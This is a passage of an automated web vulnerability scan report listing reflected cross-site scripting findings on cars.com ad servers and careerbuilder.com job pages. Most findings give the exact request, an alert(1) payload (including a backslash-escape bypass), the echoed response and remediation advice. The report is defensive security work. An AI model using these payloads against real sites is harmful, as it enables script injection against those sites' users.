P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3764e3f66300000000c0050\\";alert(1)//7ed6d85a66a/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Her
...[SNIP]...

2.10. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40578\"%3balert(1)//3b419f8cdbf was submitted in the REST URL parameter 2. This input was echoed as 40578\\";alert(1)//3b419f8cdbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random40578\"%3balert(1)//3b419f8cdbf=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:19 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 609
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3764e3f66300000000/acc_random40578\\";alert(1)//3b419f8cdbf=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=i
...[SNIP]...

2.11. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a4e\"%3balert(1)//11eb5132b70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71a4e\\";alert(1)//11eb5132b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261?71a4e\"%3balert(1)//11eb5132b70=1 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:46 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 612
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3764e3f66300000000/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261?71a4e\\";alert(1)//11eb5132b70=1&relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&sz=160x600&cTopId=20254501&V=2&cCat=Cars_Front&cSctn=vendor&rFrame=1&fmt=standard%20graphical&cD
...[SNIP]...

2.12. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e45a\"%3balert(1)//cb7a68796a2 was submitted in the REST URL parameter 1. This input was echoed as 3e45a\\";alert(1)//cb7a68796a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver3e45a\"%3balert(1)//cb7a68796a2/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/go/about/us.jsp?aff=herald&section=H&content=cont
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:08 GMT
X-DirectServer: cvcars_DS2
Content-Type: application/x-javascript
Content-Length: 1046
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0002ECB27CF40CE06826B99361626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N4441.cars1/B4653657.2;sz=728x90;click=http://acc.cars.com/accipiter/adclick/CID=00038b062dd5e235000000003e45a\\";alert(1)//cb7a68796a2/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248/relocate=;ord=1289774580251?\">
...[SNIP]...

2.13. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3eec\"%3balert(1)//f976d163c71 was submitted in the REST URL parameter 2. This input was echoed as d3eec\\";alert(1)//f976d163c71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_randomd3eec\"%3balert(1)//f976d163c71=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/go/about/us.jsp?aff=herald&section=H&content=cont
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:10 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 1007
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0003B6107CF60CE04977032061626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N4441.cars1/B4653657.2;sz=728x90;click=http://acc.cars.com/accipiter/adclick/CID=00038b062dd5e23500000000/acc_randomd3eec\\";alert(1)//f976d163c71=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248/relocate=;ord=?\">
...[SNIP]...

2.14. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4a5\"%3balert(1)//96265a28453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f4a5\\";alert(1)//96265a28453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248?7f4a5\"%3balert(1)//96265a28453=1 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/go/about/us.jsp?aff=herald&section=H&content=cont
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:06 GMT
X-DirectServer: cvcars_DS2
Content-Type: application/x-javascript
Content-Length: 1052
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=000E8A457CF10CE04AD8E1D861626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N4441.cars1/B4653657.2;sz=728x90;click=http://acc.cars.com/accipiter/adclick/CID=00038b062dd5e23500000000/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248?7f4a5\\";alert(1)//96265a28453=1&relocate=;ord=1289774580251?\">
...[SNIP]...

2.15. http://accounting.careerbuilder.com/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51115"%20a%3db%20d5b4f13e8c1 was submitted in the lr parameter. This input was echoed as 51115" a=b d5b4f13e8c1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lr=cbcb_mhf48aa51115"%20a%3db%20d5b4f13e8c1 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 235413
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 23:28:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Accoun
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa51115" a=b d5b4f13e8c1" />
...[SNIP]...

2.16. http://accounting.careerbuilder.com/ag.ic/Florida/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270f0"%20a%3db%20e3d0cbef4fe was submitted in the lr parameter. This input was echoed as 270f0" a=b e3d0cbef4fe in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida/?lr=cbcb_mhf48aa270f0"%20a%3db%20e3d0cbef4fe HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195258
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR10
Date: Sun, 14 Nov 2010 23:08:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa270f0" a=b e3d0cbef4fe" />
...[SNIP]...

2.17. http://accounting.careerbuilder.com/ag.ic/Florida/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53581'-alert(1)-'707915ba59b was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida/?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196172
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 23:12:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.18. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cca06'%3b229e8665375 was submitted in the REST URL parameter 2. This input was echoed as cca06';229e8665375 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miamicca06'%3b229e8665375?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&sc=1&ff=21&excrit=QID=A3853799236048;st=a;use=ALL;TID=0;CTY=Miami;SID=FL;CID=US;ENR=NO;DTP=DRNS;YDI=YES;IND=ALL;PDQ=All;PDQ=All;PAYL=0;PAYH=gt120;POY=NO;ETD=ALL;RE=ALL;MGT=DC;SUP=DC;FRE=30;CHL=ag;QS=sid_unknown;SS=NO;TITL=0;OB=-modifiedint;RAD=30;JQT=RAD;JDV=False;ExpHigh=gt50;ExpLow=0;MaxLowExp=-1 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193512
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miamicca06';229e8665375:mxdl41=pg=1&sc=1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR8
Date: Sun, 14 Nov 2010 23:17:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miamic
...[SNIP]...
<script language="JavaScript">
var googlekw = 'Miamicca06';229E8665375 Accounting Jobs on CareerBuilder.com';
</script>
...[SNIP]...

2.19. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a13"%20a%3db%207e7fcc80efe was submitted in the lr parameter. This input was echoed as 58a13" a=b 7e7fcc80efe in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa58a13"%20a%3db%207e7fcc80efe HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191257
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:05:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa58a13" a=b 7e7fcc80efe" />
...[SNIP]...

2.20. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59906'-alert(1)-'795c61b5e19 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191944
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:06:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.21. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48aa'-alert(1)-'9d78db8d0a5 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
